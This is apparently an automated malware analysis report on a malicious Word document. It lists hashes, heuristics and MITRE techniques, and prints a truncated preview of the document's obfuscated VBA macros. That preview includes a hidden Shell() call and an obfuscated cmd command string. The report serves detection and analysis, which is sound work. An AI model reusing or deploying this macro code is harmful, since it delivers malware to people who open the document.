Office (OLE) malware analysis — malicious · ee36c1239bfffed1

MALICIOUS

Office (OLE)

162.8 KB Created: 2018-07-17 22:13:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: b8b85cf371469d84043bb6b87494bc1e SHA-1: 779fdbde234d4df9a774fa9bd4f68bfc94ed16e3 SHA-256: ee36c1239bfffed188c3fddb35fba8f1ea519828d16e9e46a957bba5cd2713f9

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document with a high percentage of slack space, indicating potential obfuscation or embedded content. A critical heuristic firing indicates the presence of a Shell() call within a Document_Open VBA macro. This macro is designed to execute arbitrary commands, strongly suggesting it's used to download and execute a secondary payload. No specific family could be identified, but the technique is common for initial payload delivery.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 166,656 bytes but its declared streams total only 56,811 bytes — 109,845 bytes (66%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29875 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29875 bytes
SHA-256: `61b2ba2f72ffb24c056ad4f02e36c660980abc7aaa2a825cb97909c7547b075a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RdPbsOuRpc" Function PYcjwdrWVGcj() OjZFz = NwIbm * rbjUw * (84365 * jdUulj + 41869 + wwLjba) OkOWv = QwmiPv * QJwoO * (40166 * TwnRm + 43412 + RCLBjq) FIObL = jjScE * VRBofi * (70216 * GVqDH + 42566 + MlrGLj) SzEVj = (77164 / JjhiZu - 20895 - aBwBb * poWcXO * zrKkAE - WrVLu / KKDFwm) vVhChC = tzkzO * ftoRJ * (98043 * OEiHLX + 40245 + NjzHL) KCThS = QmuTC * bNWRN * (28011 * nRwzkZ + 14049 + vbjjFR) nEFZm = tZhcV * vlBXJ * (38235 * BkSKTp + 32282 + uaWtt) vjMAkH = Azbtu * hsSvS * (63215 * qmZrKh + 98600 + NnqCoE) End Function Function icYQdcIitMZp() XtYqtj = (66075 / nGljil - 32648 - kaGMJh * kapOJ * wVzwSj - XwuHC / oSiuw) BbMvjs = (18998 / jUBwiu - 18628 - qrmsHT * Pccok * LRmCGj - bkkZjv / rEmQUi) hrJmSL = (11914 / Sjqdwp - 67650 - NihoTO * mbNdZ * pNfFt - NXDYj / hEhHG) OcwiA = (67167 / ioQDVZ - 5789 - lmkLEF * ojzJF * tFjqrr - WWQzk / cifqld) zwdHwL = (61048 / WWLFi - 63294 - cVLXCd * MJFAh * JnfUSp - MMGiu / srAsT) End Function Function uCqKMmUvRpQDut(UWYNQSMEN) On Error Resume Next TiKzT = EYAXD * tYKbH + 12398 - 12052 + 25773 * LqYKp - UCVBP / wmBXi - dUHvF / ptsJHA sFCQha = bJXSVu * wTlCs + 15627 - 39854 + 97323 * ipANJ - zkBMNl / iaGJK - HMiKB / CimMZS tIrmm = ukWiVn * zlIEd + 79856 - 54582 + 85590 * PljVw - KuUwU / CdKkrn - kkRjBj / GACXOS aGQSnvIT = Shell(UWYNQSMEN, 35373193 - 35373193) hwJZBP = OoitWK * nEnvR + 63402 - 56740 + 59514 * wMjHma - onuDsz / zuJdnf - ObQuBP / HwnSC TbjMQ = MnQIhW * kKvjzM + 82536 - 80775 + 98501 * zOHKLX - utrAOz / wtYvY - BUcIz / QpUHCN End Function Function RHCoCqGc() ZHbqV = blKvYP * bDVHmN + 96896 - 22913 + 57526 * KVrzt - ldHzjj / Jlhrwp - wsOBhL / PBrzov zOpPzi = rBOMJ * UFBLio + 50113 - 51805 + 81686 * sjsqd - uDZflr / NuRDN - ZkjbwS / vJPdfT qUnBID = zoklTN * KRhrGk + 80181 - 72062 + 47918 * cBbzdH - zIRLv / FnkcDY - bwuRdl / OVXnE VihhI = SRQEv * MWEVz + 42999 - 80233 + 13723 * HpSid - bPBrl / rQCKRh - jawwl / nszVwS End Function Attribute VB_Name = "rkoiVPAkzho" Function waafif() On Error Resume Next PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv) IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs) wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + " ;" + " /^F " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + " " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F" oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG) YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU) dRDukrAhzjO = "H toke" + "ns= " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + " ," + " %^" + "x ; " + " , In " + ", ( ;" + " " + ";" BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + " ^\| " + " " + "; ^^" + "FinDst" UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM TwpanGGOGdw = "r " + ", ; " + " ^" + "^SHC " + " '" aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " , " + "%" + "^x" + ", ," rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup vuPZnQlUUkw = " k2D" + "/V^4" + "^5" + "FV" + "C " RXvuJ = 51101 - MRBUcJ - 66699 + jLGqYu * JAdHB / SOJzO - 28287 - QRnKcz brVHHG = " , ," + " " + "n0XEyw" + "g" + "5" + CStr(Chr(CZiDqwXC + kJpJZWzmDXPV + 109 + QvXrkzYhoMZJlS + iRUzAaWLZnYz)) + "/^r " + CStr(Chr(uhSjnuZjRGHC + jPk ... (truncated)

SHA-256: 61b2ba2f72ffb24c056ad4f02e36c660980abc7aaa2a825cb97909c7547b075a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RdPbsOuRpc"
Function PYcjwdrWVGcj()
   OjZFz = NwIbm * rbjUw * (84365 * jdUulj + 41869 + wwLjba)
   OkOWv = QwmiPv * QJwoO * (40166 * TwnRm + 43412 + RCLBjq)
   FIObL = jjScE * VRBofi * (70216 * GVqDH + 42566 + MlrGLj)
   SzEVj = (77164 / JjhiZu - 20895 - aBwBb * poWcXO * zrKkAE - WrVLu / KKDFwm)
   vVhChC = tzkzO * ftoRJ * (98043 * OEiHLX + 40245 + NjzHL)
   KCThS = QmuTC * bNWRN * (28011 * nRwzkZ + 14049 + vbjjFR)
   nEFZm = tZhcV * vlBXJ * (38235 * BkSKTp + 32282 + uaWtt)
   vjMAkH = Azbtu * hsSvS * (63215 * qmZrKh + 98600 + NnqCoE)
End Function
Function icYQdcIitMZp()
   XtYqtj = (66075 / nGljil - 32648 - kaGMJh * kapOJ * wVzwSj - XwuHC / oSiuw)
   BbMvjs = (18998 / jUBwiu - 18628 - qrmsHT * Pccok * LRmCGj - bkkZjv / rEmQUi)
   hrJmSL = (11914 / Sjqdwp - 67650 - NihoTO * mbNdZ * pNfFt - NXDYj / hEhHG)
   OcwiA = (67167 / ioQDVZ - 5789 - lmkLEF * ojzJF * tFjqrr - WWQzk / cifqld)
   zwdHwL = (61048 / WWLFi - 63294 - cVLXCd * MJFAh * JnfUSp - MMGiu / srAsT)
End Function
Function uCqKMmUvRpQDut(UWYNQSMEN)
On Error Resume Next
   TiKzT = EYAXD * tYKbH + 12398 - 12052 + 25773 * LqYKp - UCVBP / wmBXi - dUHvF / ptsJHA
   sFCQha = bJXSVu * wTlCs + 15627 - 39854 + 97323 * ipANJ - zkBMNl / iaGJK - HMiKB / CimMZS
   tIrmm = ukWiVn * zlIEd + 79856 - 54582 + 85590 * PljVw - KuUwU / CdKkrn - kkRjBj / GACXOS
aGQSnvIT = Shell(UWYNQSMEN, 35373193 - 35373193)
   hwJZBP = OoitWK * nEnvR + 63402 - 56740 + 59514 * wMjHma - onuDsz / zuJdnf - ObQuBP / HwnSC
   TbjMQ = MnQIhW * kKvjzM + 82536 - 80775 + 98501 * zOHKLX - utrAOz / wtYvY - BUcIz / QpUHCN
End Function
Function RHCoCqGc()
   ZHbqV = blKvYP * bDVHmN + 96896 - 22913 + 57526 * KVrzt - ldHzjj / Jlhrwp - wsOBhL / PBrzov
   zOpPzi = rBOMJ * UFBLio + 50113 - 51805 + 81686 * sjsqd - uDZflr / NuRDN - ZkjbwS / vJPdfT
   qUnBID = zoklTN * KRhrGk + 80181 - 72062 + 47918 * cBbzdH - zIRLv / FnkcDY - bwuRdl / OVXnE
   VihhI = SRQEv * MWEVz + 42999 - 80233 + 13723 * HpSid - bPBrl / rQCKRh - jawwl / nszVwS
End Function


Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
   IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
   qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + "  ;" + " /^F  " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + "   " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
   YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns=  " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + "  ," + "  %^" + "x ; " + " , In " + ", (  ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
   RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + "  ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r  " + ",  ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
   kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " ,  " + "%" + "^x" + ",   ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
   rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5" + "FV" + "C  "
RXvuJ = 51101 - MRBUcJ - 66699 + jLGqYu * JAdHB / SOJzO - 28287 - QRnKcz
brVHHG = "  ,  ," + " " + "n0XEyw" + "g" + "5" + CStr(Chr(CZiDqwXC + kJpJZWzmDXPV + 109 + QvXrkzYhoMZJlS + iRUzAaWLZnYz)) + "/^r " + CStr(Chr(uhSjnuZjRGHC + jPk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.